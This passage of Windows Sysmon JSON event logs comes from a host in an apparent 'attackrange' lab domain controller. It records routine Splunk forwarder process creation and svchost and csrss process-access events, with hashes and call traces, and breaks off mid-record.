{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.234\r\nProcessGuid: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nProcessId: 1344\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.234","ProcessGuid":"{A837DB8D-02FA-5F25-0000-00100C370600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02FA-5F25-0000-00100C370600}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4246,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02FA-5F25-0000-00100C370600}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4247,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4248,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4249,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 